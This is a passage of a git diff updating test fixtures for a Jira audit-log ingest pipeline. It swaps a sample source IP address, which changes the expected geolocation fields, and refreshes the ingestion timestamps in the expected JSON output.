93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]} 
+{"timestamp":"2021-11-22T00:34:47.536Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"45 - 94"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z"}]} +{"timestamp":"2021-11-22T00:34:40.008Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"175.16.199.1","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"44 - 93"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z"}]} 
{"timestamp":"2021-11-22T00:34:23.154Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"personal.access.tokens.audit.log.category","category":"Security","actionI18nKey":"personal.access.tokens.audit.log.summary.token.created","action":"Personal access token created"},"affectedObjects":[{"name":"test.user","type":"User","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","id":"JIRAUSER10000"}],"changedValues":[],"source":"10.50.33.72","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"personal.access.tokens.audit.log.extra.attribute.name","name":"Token Name","value":"asdf"}]} {"timestamp":"2021-11-22T00:32:20.234Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"10.50.33.72","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"1 - 40"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"40"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:33.746Z"}]} 
{"timestamp":"2021-11-22T00:31:52.991Z","author":{"name":"test.user","type":"ApplicationUser","id":"10000","uri":"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user","avatarUri":""},"type":{"categoryI18nKey":"atlassian.audit.event.category.audit","category":"Auditing","actionI18nKey":"atlassian.audit.event.action.audit.search","action":"Audit Log search performed"},"affectedObjects":[],"changedValues":[],"source":"10.50.33.72","system":"http://jira.internal:8088","method":"Browser","extraAttributes":[{"nameI18nKey":"atlassian.audit.event.attribute.id","name":"ID Range","value":"41 - 90"},{"nameI18nKey":"atlassian.audit.event.attribute.query","name":"Query","value":""},{"nameI18nKey":"atlassian.audit.event.attribute.results","name":"Results returned","value":"50"},{"nameI18nKey":"atlassian.audit.event.attribute.timestamp","name":"Timestamp Range","value":"2021-11-22T00:08:33.887Z - 2021-11-22T00:31:37.412Z"}]} diff --git a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index c378a10ee48..3a1ea7accb0 100644 --- a/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_jira/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -13,7 +13,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { 
@@ -21,27 +21,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590166171Z", - "original": "{\"timestamp\":\"2021-11-22T00:34:47.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"45 - 94\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z\"}]}", + "ingested": "2021-12-15T09:00:40.254592510Z", + "original": 
"{\"timestamp\":\"2021-11-22T00:34:47.536Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"45 - 94\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.163Z - 2021-11-22T00:34:40.008Z\"}]}", "type": "info", "kind": "event" }, @@ -98,7 +95,7 @@ "jira.internal" ], "ip": [ - "55.6.73.144" + "175.16.199.1" ] }, "service": { 
@@ -106,27 +103,24 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" + "lon": 125.3228, + "lat": 43.88 } }, - "address": "55.6.73.144", - "ip": "55.6.73.144" + "address": "175.16.199.1", + "ip": "175.16.199.1" }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590196558Z", - "original": "{\"timestamp\":\"2021-11-22T00:34:40.008Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"55.6.73.144\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"44 - 93\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z\"}]}", + "ingested": "2021-12-15T09:00:40.254596749Z", + "original": 
"{\"timestamp\":\"2021-11-22T00:34:40.008Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"44 - 93\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.151Z - 2021-11-22T00:34:23.154Z\"}]}", "type": "info", "kind": "event" }, 
@@ -195,7 +189,7 @@ }, "event": { "action": "personal.access.tokens.audit.log.summary.token.created", - "ingested": "2021-12-08T14:50:33.590204376Z", + "ingested": "2021-12-15T09:00:40.254598311Z", "original": "{\"timestamp\":\"2021-11-22T00:34:23.154Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"personal.access.tokens.audit.log.category\",\"category\":\"Security\",\"actionI18nKey\":\"personal.access.tokens.audit.log.summary.token.created\",\"action\":\"Personal access token created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"User\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"personal.access.tokens.audit.log.extra.attribute.name\",\"name\":\"Token Name\",\"value\":\"asdf\"}]}", "type": [ "admin", 
@@ -265,7 +259,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590207338Z", + "ingested": "2021-12-15T09:00:40.254601187Z", "original": "{\"timestamp\":\"2021-11-22T00:32:20.234Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"40\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:33.746Z\"}]}", "type": "info", "kind": "event" 
@@ -335,7 +329,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590209945Z", + "ingested": "2021-12-15T09:00:40.254602524Z", "original": "{\"timestamp\":\"2021-11-22T00:31:52.991Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"41 - 90\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"50\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:33.887Z - 2021-11-22T00:31:37.412Z\"}]}", "type": "info", "kind": "event" 
@@ -405,7 +399,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590212585Z", + "ingested": "2021-12-15T09:00:40.254603763Z", "original": "{\"timestamp\":\"2021-11-22T00:31:37.412Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"69 - 78\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.227Z - 2021-11-22T00:08:34.249Z\"}]}", "type": "info", "kind": "event" 
@@ -475,7 +469,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590215181Z", + "ingested": "2021-12-15T09:00:40.254604997Z", "original": "{\"timestamp\":\"2021-11-22T00:31:26.455Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 88\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"10\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:08:34.266Z - 2021-11-22T00:30:59.449Z\"}]}", "type": "info", "kind": "event" 
@@ -545,7 +539,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590217809Z", + "ingested": "2021-12-15T09:00:40.254606222Z", "original": "{\"timestamp\":\"2021-11-22T00:30:59.449Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"87\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:26:03.206Z\"}]}", "type": "info", "kind": "event" 
@@ -615,7 +609,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590220369Z", + "ingested": "2021-12-15T09:00:40.254607495Z", "original": "{\"timestamp\":\"2021-11-22T00:26:03.206Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"86\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:12:02.856Z\"}]}", "type": "info", "kind": "event" 
@@ -685,7 +679,7 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-08T14:50:33.590222928Z", + "ingested": "2021-12-15T09:00:40.254608772Z", "original": "{\"timestamp\":\"2021-11-22T00:12:02.856Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"85\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"}]}", "type": "info", "kind": "event" 
@@ -755,7 +749,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:33.590225541Z", + "ingested": "2021-12-15T09:00:40.254609976Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.545Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 3.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10002\",\"id\":\"10002\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 3.0\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -825,7 +819,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:33.590228415Z", + "ingested": "2021-12-15T09:00:40.254611358Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.543Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 2.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10001\",\"id\":\"10001\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 2.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-28\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -900,7 +894,7 @@ }, "event": { "action": "jira.auditing.version.released", - "ingested": "2021-12-08T14:50:33.590231031Z", + "ingested": "2021-12-15T09:00:40.254612544Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.535Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.released\",\"action\":\"Project version released\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -963,7 +957,7 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-08T14:50:33.590233642Z", + "ingested": "2021-12-15T09:00:40.254613775Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.521Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.version.created\",\"action\":\"Project version created\"},\"affectedObjects\":[{\"name\":\"Version 1.0\",\"type\":\"VERSION\",\"uri\":\"http://jira.internal:8088/secure/VersionEdit!default.jspa?versionId=10000\",\"id\":\"10000\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Version 1.0\"},{\"key\":\"Release date\",\"i18nKey\":\"version.releasedate\",\"to\":\"2021-11-14\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1038,7 +1032,7 @@ }, "event": { "action": "jira.auditing.project.roles.changed", - "ingested": "2021-12-08T14:50:33.590236188Z", + "ingested": "2021-12-15T09:00:40.254614952Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.506Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.roles.changed\",\"action\":\"Project roles changed\"},\"affectedObjects\":[{\"name\":\"Developers\",\"type\":\"PROJECT_ROLE\",\"id\":\"10100\"},{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"}],\"changedValues\":[{\"key\":\"Users\",\"i18nKey\":\"admin.common.words.users\",\"to\":\"JIRAUSER10000\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -1107,7 +1101,7 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-08T14:50:33.590238784Z", + "ingested": "2021-12-15T09:00:40.254616175Z", "original": "{\"timestamp\":\"2021-11-22T00:08:34.297Z\",\"author\":{\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"id\":\"10000\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.projects\",\"category\":\"projects\",\"actionI18nKey\":\"jira.auditing.project.created\",\"action\":\"Project created\"},\"affectedObjects\":[{\"name\":\"test\",\"type\":\"PROJECT\",\"uri\":\"http://jira.internal:8088/secure/ViewProject.jspa?pid=10000\",\"id\":\"10000\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Default Assignee\",\"i18nKey\":\"admin.projects.default.assignee\",\"to\":\"Unassigned\"},{\"key\":\"Description\",\"i18nKey\":\"common.concepts.description\",\"to\":\"\"},{\"key\":\"Key\",\"i18nKey\":\"common.words.key\",\"to\":\"TEST\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"test\"},{\"key\":\"Project Lead\",\"i18nKey\":\"common.concepts.projectlead\",\"to\":\"test.user\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" 
